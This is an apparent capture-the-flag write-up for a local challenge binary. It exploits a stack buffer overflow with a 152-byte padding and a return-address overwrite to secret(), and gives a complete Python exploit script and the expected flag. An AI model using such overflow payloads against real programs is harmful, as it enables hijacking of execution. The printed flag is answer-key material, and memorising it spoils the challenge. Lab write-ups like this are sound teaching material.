Code Osiris – TOKEN2

Target: local code_osiris_v2

Background

vulnerable_function in code_osiris_v2 reads an oversized argument and lets us overwrite RIP. Redirecting it to secret() at 0x401397 reveals the token; the offset to RIP is 152 bytes.

From Nothing to Working

1. Confirm protections: NX off, no canary, no PIE (checksec).
2. Locate secret() via nm/objdump (0x401397).
3. Craft payload: 152 bytes of padding + secret() address (little-endian).
4. Feed the payload as argv/stdin; secret() decrypts and prints the token.

Command

Save and run as python3 token2_exploit.py beside code_osiris_v2.

#!/usr/bin/env python3
# token2_exploit.py
import struct, subprocess

BINARY = "./code_osiris_v2"
OFFSET = 152
SECRET = 0x401397

payload = b"A"*OFFSET + struct.pack("<Q", SECRET)
proc = subprocess.run([BINARY], input=payload, capture_output=True, timeout=3)
print(proc.stdout.decode(errors="ignore") + proc.stderr.decode(errors="ignore"))

Expected Output

TOKEN2: PCCC{PuJN-0294}